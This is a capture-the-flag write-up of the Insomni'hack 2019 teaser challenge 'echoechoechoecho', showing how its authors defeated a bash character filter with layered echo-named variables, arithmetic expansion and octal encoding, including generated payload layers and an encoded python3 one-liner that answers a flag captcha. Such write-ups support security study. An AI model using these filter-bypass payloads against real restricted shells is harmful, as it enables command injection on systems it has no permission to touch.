Tags: bash echo pwn 

Rating: 3.0


Echoechoechoecho was a service at the 2019 Insomni'hack teaser with 216 points and 18 solves.


Echo echo echo echo, good luck

nc 1337

The Service

banner = """
                            _..._                 .-'''-.
                         .-'_..._''.             '   _    \\
       __.....__       .' .'      '.\  .       /   /` '.   \\
   .-''         '.    / .'           .'|      .   |     \  '
  /     .-''"'-.  `. . '            <  |      |   '      |  '
 /     /________\   \| |             | |      \    \     / /
 |                  || |             | | .'''-.`.   ` ..' /
 \    .-------------'. '             | |/.'''. \  '-...-'`
  \    '-.____...---. \ '.          .|  /    | |
   `.             .'   '. `._____.-'/| |     | |
     `''-...... -'       `-.______ / | |     | |
                                  `  | '.    | '.
                                     '---'   '---'

The service allows us to run any bash code... But it has to pass this little sanitization function first:

    if not all(ord(c) < 128 for c in payload):
        bye("ERROR ascii only pls")

    if re.search(r'[^();+$\\= \']', payload.replace("echo", "")):
        bye("ERROR invalid characters")

    # real echolords probably wont need more special characters than this
    if payload.count("+") > 1 or \
            payload.count("'") > 1 or \
            payload.count(")") > 1 or \
            payload.count("(") > 1 or \
            payload.count("=") > 2 or \
            payload.count(";") > 3 or \
            payload.count(" ") > 30:
        bye("ERROR Too many special chars.")

If we pass this check, our input can be piped to n bash instances (with n being user-provided):

print("And how often would you like me to echo that?")
count = max(min(int(input()), 10), 0)

payload += "|bash"*count

That means we cannot use most chars, only use a small subset of special chars--and a lot of echos!

Our approach

First we had to pull up a nice bash scripting cheatsheet. devhints.io/bash helped a lot!

In the following we describe each layer we built. Every next layer had to be escaped in such a way, that it could be echoed into the next bash instance.


It was quickly clear that we would need more special chars, especially equals signs, so in the first layer, we assigned equals to $echoecho: "echoecho " + r"=\=;".

Since we then had to replace and reuse the signs in every other layer and properly escape them, we quickly started scripting variable ("echo" * i) allocations.


After regaining access to infinite equals signs, we hunted down semicolons, since we only had two left:

smcln = c([escape_by(r"\;;", 1)], 1)

with the c function being a helper to define new characters.

Since, after this layer, escaping started to get messy, so we tried to automate that too, using re.escape like:

def escape_by(s, level):
    if not level:
        return s
    for i in range(level):
        s = re.escape(s)
    return s


With the magnificent = and ; tools, we could now assign all other allowed specialchars to echo-named variables:

bopen = c([escape_by(r"\(", 2), smcln], 2)
bclose = c([escape_by(r"\)", 2), smcln], 2)
plus = c([escape_by(r"\+", 2), smcln], 2)
single_quote = c([escape_by(r"\'", 2), smcln], 2)

which results in the following legible code (all in one line), when printed and escaped:

echo echoechoechoecho$echoecho\\\\\\\(\$echoechoecho echoechoechoechoecho$echoecho\\\\\\\)\$echoechoecho echoechoechoechoechoecho$echoecho\\\\\\\+\$echoechoecho echoechoechoechoechoechoecho$echoecho\\\\\\\'\$echoechoecho


We finally had regained access to all special chars and could think about how to encode the actual payload.

It was quickly clear that an octal representation (like $'\101\101...') of characters is ideal, since anything else would already need chars, like an xfor hex.

We had initially figured out the pid of our initial bash was always 8. We also knew from the cheat sheet that $(($CAN_HAZ_MATHS)) can evaluate mathematical expressions in bash. However we failed to failed to find a good way to calculate anything with the PID.

After quite a while we had the idea that an empty variable inside the math env evaluates to 0 (or probably did it by accident). For that we could use any variable, including echo. That means that echoechoechoechoechoecho = $((echo)) assigns 0 to that echo-like variable! Success :)

We also reread the sheet and came to the conclusion that $((++echo)) will increase the variable and return its result. Repeating this another 6 times (with increasingly long echo-like variablenames), we got placeholder for the entire octal numeric range ?

# bopen is the palceholder evaluating to '(' bclose == ')', plus == '+', smcln == ';'
def next_num():
    return c([escape_by("$", 3), bopen, bopen, plus, plus, escape_by(r"\echo", 2), bclose, bclose, escape_by("\\", 2), smcln], 3)


Finally, we could encode any commands, and issue them to the server. We did a quick ls (only 2547 characters), and found /flag!

But oh boy were we not done yet.


The flag was only readable by root :/ (Our user was echolord, because of course it was).

Next to the flag, we found /get_flag, a nice little commandline tool, giving us the flag. Not. The tool outputted roughly this, with some_int being.. some random int:

Please solve this little captcha:
[some_int] + [some_int] + [some_int] + [some_int] + [some_int]
[calcualted_int] != 0 :(


That meant we had to interact with this command-line tool, but only hat single shot bash commands. We did not get strerr output and most tools (like python) did not work. However we knew there had to be a python somewhere, since the server was running in python - and we had no clue how to do it in bash only.

Luckily we found python3 in its usual path, and then could start scripting:

from subprocess import Popen, PIPE
test = Popen(["/get_flag"], stdin=PIPE, stdout=PIPE, bufsize=1, universal_newlines=True)
q = test.stdout.readline()
print("Question:", q)
a = eval(q)
print("Python end")

We spawn the program as subprocess, simply eval the 5 integers (favourite function <3 but still consider to use literal_eval if it is your own server) and finally print the result.

We then sent this script as encoded bash command, using:

cmd = "/usr/bin/python3 -c '{}';".format(pycmd.replace("\n", ";"))

Due to the restricted environment, building this took forever - we did not get output in case it crashed and building a try-except in a single line in python seemed like too much work.

But in the end... we were finally presented the flag:


Thanks eboda for this nice brainf*ck and the captcha from hell.

Writeup by @mmunnier and @domenukk

Prior Challenges

Sadly we did not find the writeup of last year's 34c3 challenge by eboda in similar style: https://hack.more.systems/writeup/2017/12/30/34c3ctf-minbashmaxfun/

It might have helped ¯\_(ツ)_/¯.


Find the script here

In the following, a few of the pretty generated output bytes in each iteration:

In the First Bash (LAYER 0)

echoecho=\=; echo echoechoecho$echoecho\\\;\; echo echoechoechoecho$echoecho\\\\\\\(\$echoechoecho echoechoechoechoecho$echoecho\\\\\\\)\$echoechoecho echoechoechoechoechoecho$echoecho\\\\\\\+\$echoechoecho echoechoechoechoechoechoecho$echoecho\\\\\\\'\$echoechoecho...

In the Second Bash (LAYER 1)

echoechoecho=\;; echo echoechoechoecho=\\\($echoechoecho echoechoechoechoecho=\\\)$echoechoecho echoechoechoechoechoecho=\\\+$echoechoecho echoechoechoechoechoechoecho=\\\'$echoechoecho echo echoechoechoechoechoechoechoecho=\\\$\$echoechoechoecho\$echoechoechoecho\\echo\$echoechoechoechoecho\$echoechoechoechoecho\\$echoechoecho...

In the Third Bash (LAYER 2)

echoechoechoecho=\(; echoechoechoechoecho=\); echoechoechoechoechoecho=\+; echoechoechoechoechoechoecho=\'; echo echoechoechoechoechoechoechoecho=\$$echoechoechoecho$echoechoechoecho\echo$echoechoechoechoecho$echoechoechoechoecho\; echoechoechoechoechoechoechoechoecho=\$$echoechoechoecho$echoechoechoecho$echoechoechoechoechoecho$echoechoechoechoechoecho\echo$echoechoechoechoecho$echoechoechoechoecho\;...

Fourth Bahs (LAYER 3)

echoechoechoechoechoechoechoecho=$((echo)); echoechoechoechoechoechoechoechoecho=$((++echo)); echoechoechoechoechoechoechoechoechoecho=$((++echo)); echoechoechoechoechoechoechoechoechoechoecho=$((++echo)); echoechoechoechoechoechoechoechoechoechoechoecho=$((++echo));


echo $'\57\165\163\162\57\142\151\156\57\160\171\164\150\157\156\63\40\55\143\40\47\146\162\157\155\40\163\165\142\160\162\157\143\145\163\163\40\151\155\160\157\162\164\40\120\157\160\145\156\54\40\120\111\120\105\73\164\145\163\164\40\75\40\120\157\160\145\156\50\133\42\57\147\145\164\137\146\154\141\147\42\135\54\40\163\164\144\151\156\75\120\111\120\105\54\40\163\164\144\157\165\164\75\120\111\120\105\54\40\142\165\146\163\151\172\145\75\61\54\40\165\156\151\166\145\162\163\141\154\137\156\145\167\154\151\156\145\163\75\124\162\165\145\51\73\160\162\151\156\164\50\164\145\163\164\56\163\164\144\157\165\164\56\162\145\141\144\154\151\156\145\50\51\51\73\161\40\75\40\164\145\163\164\56\163\164\144\157\165\164\56\162\145\141\144\154\151\156\145\50\51\73\160\162\151\156\164\50\42\121\165\145\163\164\151\157\156\72\42\54\40\161\51\73\141\40\75\40\145\166\141\154\50\161\51\73\160\162\151\156\164\50\141\51\73\164\145\163\164\56\163\164\144\151\156\56\167\162\151\164\145\50\163\164\162\50\141\51\53\42\134\156\42\51\73\160\162\151\156\164\50\164\145\163\164\56\163\164\144\157\165\164\56\162\145\141\144\154\151\156\145\50\51\51\73\160\162\151\156\164\50\164\145\163\164\56\160\157\154\154\50\51\51\73\160\162\151\156\164\50\164\145\163\164\56\143\157\155\155\165\156\151\143\141\164\145\50\42\167\150\157\141\155\151\42\51\51\73\160\162\151\156\164\50\42\120\171\164\150\157\156\40\145\156\144\42\51\73\47\73\40\167\150\157\141\155\151'


/usr/bin/python3 -c 'from subprocess import Popen, PIPE;test = Popen(["/get_flag"], stdin=PIPE, stdout=PIPE, bufsize=1, universal_newlines=True);print(test.stdout.readline());q = test.stdout.readline();print("Question:", q);a = eval(q);print(a);test.stdin.write(str(a)+"\n");print(test.stdout.readline());print(test.poll());print(test.communicate("fun"));print("Python end");';
Original writeup (https://github.com/ENOFLAG/writeups/blob/master/insomnihackteaser2019/echoechoechoecho.md).